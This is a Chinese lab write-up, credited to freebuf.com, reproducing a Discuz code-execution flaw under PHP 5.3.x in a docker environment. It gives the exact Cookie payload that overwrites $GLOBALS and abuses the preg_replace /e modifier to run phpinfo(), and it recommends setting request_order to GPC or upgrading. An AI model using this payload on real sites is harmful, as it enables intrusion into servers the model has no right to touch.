由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。
漏洞环境搭建:
docker-compose up -d
拉取成功
启动后,访问http://your-ip:8080/install/来安装discuz,数据库地址填写db,数据库名为
discuz,数据库账号密码均为root。
来到主页
漏洞复现
管理员登录,随便找到一个帖子,抓包
在repeater模块向其发送数据包,并在Cookie中增加
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
成功代码执行
建议:更改php 5.3.x里的php.ini设置,设置request_order为GPC或更新最新版Discuz版本
来源:freebuf.com 2021-05-21 14:43:54 by: LN7034
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册